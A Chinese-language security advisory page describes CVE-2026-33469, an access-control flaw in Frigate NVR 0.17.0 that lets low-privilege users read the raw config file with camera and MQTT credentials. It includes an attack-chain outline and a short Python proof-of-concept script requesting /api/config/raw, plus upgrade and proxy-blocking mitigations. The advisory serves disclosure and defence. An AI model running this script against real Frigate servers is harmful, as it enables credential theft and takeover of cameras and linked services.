IPBUF安全漏洞报告
English
CVE-2026-33469 CVSS 6.5 中危

CVE-2026-33469 Frigate敏感信息泄露漏洞

披露日期: 2026-03-26

漏洞信息

漏洞编号
CVE-2026-33469
漏洞类型
敏感信息泄露
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Frigate

相关标签

敏感信息泄露权限绕过FrigateCWE-200

漏洞概述

Frigate是一款具有实时本地对象检测功能的网络视频录像机(NVR)。在0.17.0版本中,系统存在一个权限控制缺陷,允许经过身份验证的非管理员用户通过访问 `/api/config/raw` 接口获取完整的原始配置文件。该漏洞导致原本被隐藏的敏感信息(如摄像头凭据、MQTT密码等)泄露,这是由于API重构时的访问控制配置错误所致。该问题已在0.17.1版本中修复。

技术细节

该漏洞源于Frigate在版本0.17.0进行的“admin-by-default” API重构过程中引入的访问控制缺陷。在重构设计中,系统本意是将敏感配置信息的读取权限限制在管理员层级。正常情况下,`/api/config` 端点会返回经过脱敏处理的配置信息,隐藏密码等敏感字段。然而,开发者在实施权限控制时出现了疏漏:虽然 `/api/config/raw_paths` 等相关接口已被正确设置为仅管理员可访问,但用于导出完整原始配置的 `/api/config/raw` 接口却未受到同样的保护。攻击者只需拥有Frigate系统的任意有效普通用户账号(无需管理员权限),即可直接构造HTTP GET请求访问 `/api/config/raw` 接口。服务器端验证逻辑缺失,导致直接返回包含明文敏感数据的 `config.yml` 文件内容。泄露的信息包括但不限于IP摄像头的登录凭据、go2rtc流媒体凭证、MQTT服务密码、代理密钥等。攻击者利用这些凭据可直接接管摄像头设备或关联服务,严重威胁系统安全性。

攻击链分析

STEP 1
侦查
攻击者发现目标Frigate服务,并获取或注册一个低权限用户账号。
STEP 2
漏洞利用
攻击者使用低权限账号的凭证,向服务器发送GET请求至 `/api/config/raw` 端点。
STEP 3
信息泄露
服务器返回未经过滤的原始配置文件,包含摄像头密码、MQTT凭证等敏感信息。
STEP 4
横向移动
攻击者利用获取的凭证登录摄像头或其他关联服务,进一步控制内网设备。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # PoC for CVE-2026-33469 # Description: Retrieve sensitive config using a low-privilege user token. # Target: Frigate 0.17.0 target_url = "http://target-ip:5000/api/config/raw" # Replace with a valid authenticated session cookie or token auth_token = "LOW_PRIV_USER_TOKEN" headers = { "Authorization": f"Bearer {auth_token}", "Content-Type": "application/json" } try: response = requests.get(target_url, headers=headers) if response.status_code == 200: print("[+] Vulnerability Confirmed!") print("[+] Sensitive Configuration Data:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] Error occurred: {e}")

影响范围

Frigate 0.17.0

防御指南

临时缓解措施
如果无法立即升级,建议在反向代理(如Nginx)层面添加访问控制规则,阻断普通用户对 `/api/config/raw` 路径的访问,仅允许管理员IP访问,直至完成版本升级。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表